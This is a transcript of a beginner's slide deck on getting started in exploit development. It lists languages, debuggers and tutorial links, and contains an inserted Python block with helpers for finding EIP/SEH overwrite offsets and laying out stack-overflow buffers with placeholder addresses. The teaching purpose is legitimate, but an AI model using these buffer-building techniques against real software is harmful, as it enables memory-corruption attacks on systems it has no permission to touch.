Exploit Dev For Mere Mortals - Getting Started

Post on 02-Jul-2015


This presentation is for newbies to the world of exploit development. It is designed to help you get comfortable with the subject and provide you with the resources required to get started.

Transcript of Exploit Dev For Mere Mortals - Getting Started

Strategic Security, Inc. © http://www.strategicsec.com/

Exploit Development For Mere Mortals

Part 1: Getting Started

Presented By:

Joe McCray

joe@strategicsec.com

http://www.linkedin.com/in/joemccray

http://twitter.com/j0emccray


Who Is This Talk For?

Who is this for?

• Security professionals and hobbyists interested in understanding exploit development

• Security professionals and hobbyists interested in the fundamentals of writing exploits

No Geekenese:

• This is NOT a technical talk. There will be some technical info, but it's more of a getting-started guide than anything else


Things I'll Be Covering Today

• What programming languages do you need to know?

• What are the best ways to learn these languages?

• What tools do you need?

• Which tools should you start with first?

• What references should you use to get started, and more importantly, which should you avoid?


What Programming Languages Do I Need To Know/Learn?

• An Interpreted Language (Perl, Python, Ruby)

• C

• Assembly


What Programming Languages Do I Need To Know/Learn?

• If you are new to programming, start with an interpreted language first

• Perl, Python, Ruby

• YouTube is your friend; the best I've seen is from 'thenewboston'

• Python: https://www.youtube.com/watch?v=4Mf0h3HphEA

• Ruby: https://www.youtube.com/watch?v=WJlfVjGt6Hg

• Perl used to be the exploit and tool development language of choice

• Now it's Python and Ruby


What Programming Languages Do I Need To Know/Learn?

• The C Programming Language

• Greg Perry is an amazing teacher of programming languages

• I highly recommend "Absolute Beginner's Guide to C"

• Publisher: Sams; 2nd Edition

• ISBN-10: 0672305100

• ISBN-13: 978-0672305108


What Programming Languages Do I Need To Know/Learn?

The Assembly Programming Language

Vivek Ramachandran (SecurityTube.net)

@SecurityTube

Assembly For Hackers Video Series:

http://www.securitytube.net/groups?operation=view&groupId=5

http://www.securitytube.net/groups?operation=view&groupId=6


What Tools Do You Need?

• Virtualization Platform (VMware, VirtualBox, etc.)

• Target VMs (XPSP3, Win7, Ubuntu 10)

• Debuggers

• OllyDBG: http://www.ollydbg.de/

• Immunity: http://immunitysec.com/products-immdbg.shtml

• WinDBG: http://www.windbg.org/

• IDA Pro: http://www.hex-rays.com/products/ida/support/download.shtml

• Vulnerable Software

• http://www.oldapps.com/

• http://www.exploit-db.com/

• Exploit Code

• http://www.exploit-db.com/

• http://packetstormsecurity.org/files/tags/exploit/


Which Tools Should I Start With First?

• For your first few times dealing with simple exploits I'd recommend OllyDBG

• After that I think you should move to either Immunity or WinDBG

• I would say that IDA Pro should be left for advanced users


What References Should I Use To Learn ED And Which Should I Avoid?

• If you are BRAND NEW, start with these tutorials:

• http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/

• http://resources.infosecinstitute.com/seh-exploit/

• If you have a little experience, start with the Corelan.be tutorials:

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
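The workflow those first Corelan parts walk through (crash the target with a cyclic pattern, read the value that landed in EIP or in the SEH record, turn it back into an offset, rule out bad characters, then lay out the final buffer) is exactly the job the "learn an interpreted language first" slide earlier in this deck is pointing at. The block below is an added example written for this page; it is not code from the slides, from Corelan or from Metasploit. It reimplements the Metasploit pattern_create/pattern_offset idea in Python and builds both a plain EIP-overwrite buffer and an SEH-overwrite buffer. The JMP ESP and POP POP RET addresses used in the demo at the bottom are made-up placeholders, not addresses from any real module.

```python
"""Helpers for the first steps of a classic Win32 stack-overflow exploit:
find the offset that overwrites EIP (or the SEH record), then lay out the buffer.
Added example for this page; pattern scheme follows the Metasploit convention."""
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the pattern would repeat


def pattern_create(length):
    """Cyclic pattern: every 4-byte window is unique, so the value that lands
    in EIP tells you exactly where in the buffer it came from."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than the pattern can supply


def pattern_offset(value, length=MAX_PATTERN):
    """Offset of a 4-byte value inside the pattern, or -1 if it is not there.
    Accepts the integer the debugger shows in EIP (struct.pack undoes the
    little-endian byte order) or the raw bytes seen in the memory dump."""
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def badchar_test(exclude=(0x00,)):
    """Every byte 0x01..0xff except those already known to be mangled.
    Send it after the overwrite and compare against the debugger's dump."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def build_eip_overwrite(offset, ret_addr, shellcode, nop_sled=16, total_len=None):
    """[junk][EIP = address of a JMP ESP][NOP sled][shellcode][padding]."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    if total_len is not None:
        if len(buf) > total_len:
            raise ValueError("payload does not fit in %d bytes" % total_len)
        buf += b"C" * (total_len - len(buf))
    return buf


def build_seh_overwrite(offset_to_nseh, ppr_addr, shellcode, nop_sled=16):
    """[junk][nSEH = JMP SHORT +6][SEH = POP POP RET][NOP sled][shellcode].
    After POP POP RET returns into nSEH, EB 06 jumps over the two padding
    bytes and the 4-byte handler address and lands on the NOP sled."""
    nseh = b"\xeb\x06\x90\x90"
    return (b"A" * offset_to_nseh + nseh + struct.pack("<I", ppr_addr)
            + b"\x90" * nop_sled + shellcode)


if __name__ == "__main__":
    # Step 1: send pattern_create(N) to the target and read EIP in the debugger.
    crash_eip = 0x61413461          # constructed value: what EIP would show for offset 13
    off = pattern_offset(crash_eip)
    print("EIP overwritten at offset", off)
    # Step 2: check which bytes survive the copy.
    print("bad-char probe is %d bytes" % len(badchar_test(exclude=(0x00, 0x0A, 0x0D))))
    # Step 3: lay out the real buffer (addresses below are placeholders, not real modules).
    jmp_esp = 0x7C874413            # hypothetical JMP ESP address
    pop_pop_ret = 0x1001AB2C        # hypothetical POP POP RET address
    payload = b"\xcc" * 4           # INT3s stand in for shellcode so the debugger stops
    print(build_eip_overwrite(off, jmp_esp, payload, nop_sled=8, total_len=40).hex())
    print(build_seh_overwrite(100, pop_pop_ret, payload, nop_sled=4).hex())
```

Using the debugger value directly (pattern_offset(0x61413461)) rather than retyping the bytes avoids the classic beginner mistake of reversing the little-endian EIP by hand in the wrong direction; a -1 result means the value in EIP did not come from your pattern, which usually points at a partial overwrite or a bad character truncating the buffer.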


What References Should I Use To Learn ED And Which Should I Avoid?

• To break up the monotony I'd recommend doing some reversing tutorials

• http://tuts4you.com/download.php

• Stay away from the majority of books on buffer overflows

• Way too much focus on source code

• Way too much focus on classic buffer overflows on old OSs

• Books I would recommend (after you've done the tutorial list earlier) are:

• Hacking: The Art of Exploitation

• The Shellcoder's Handbook


What References Should I Use To Learn ED And Which Should I Avoid?

• If you are going to take a class at a security conference:

• Exploit Labs with Saumil Shah

• Corelan Live with Peter Van Eeckhoutte


Major Resources

Vivek Ramachandran (SecurityTube.net)

@SecurityTube

Assembly For Hackers Video Series:

http://www.securitytube.net/groups?operation=view&groupId=5

http://www.securitytube.net/groups?operation=view&groupId=6

Exploit Development Basics Video Series

http://www.securitytube.net/groups?operation=view&groupId=7

http://www.securitytube.net/groups?operation=view&groupId=4


Major Resources

Peter Van Eeckhoutte (https://www.corelan.be/)

@corelanc0d3r

Hands-down probably the best tutorials on the market:

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/


Contact Me....

Toll Free: 1-866-892-2132

Email: joe@strategicsec.com

Twitter: http://twitter.com/j0emccray

LinkedIn: http://www.linkedin.com/in/joemccray